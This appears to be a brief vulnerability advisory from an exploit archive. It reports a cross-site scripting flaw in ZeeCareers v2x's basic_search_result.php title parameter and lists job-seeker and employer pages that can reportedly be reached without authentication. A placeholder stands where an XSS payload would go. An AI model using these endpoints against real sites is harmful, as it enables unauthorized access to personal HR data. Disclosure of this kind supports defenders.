ZeeCareers 2x suffers from cross site scripting and authentication bypass vulnerabilities.
3374f7a39876151b455a37ad9eb06216e1b9b3715b79da73c9e72371a78108b3
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] ZeeCareers v2x - PHP HR Manager Website [ XSS / Auth Bypass ]
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ...
#
# // Software Info
# [x] Name : ZeeCareers v2x - PHP HR Manager Website
# [x] Vendor : http://www.zeecareers.com/
# [x] Version : 2x
# [x] Price : 149.00 USD
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [XSS]
#
# http://localhost/basic_search_result.php?title=[XSS]
#
# [Auth Bypass]
#
# http://localhost/jobseekers/editprofile.php
# http://localhost/jobseekers/forgot.php
# http://localhost/jobseekers/additionalfeatures.php
#
# [ And ]
#
# http://localhost/employers/editprofile.php
# http://localhost/employers/employer_reg.php
#
#
[#]------------------------------------------------------------------------------------------[#]
#EOF
_________________________________________________________________
Keep your friends updated—even when you’re not signed in.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_5:092010
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed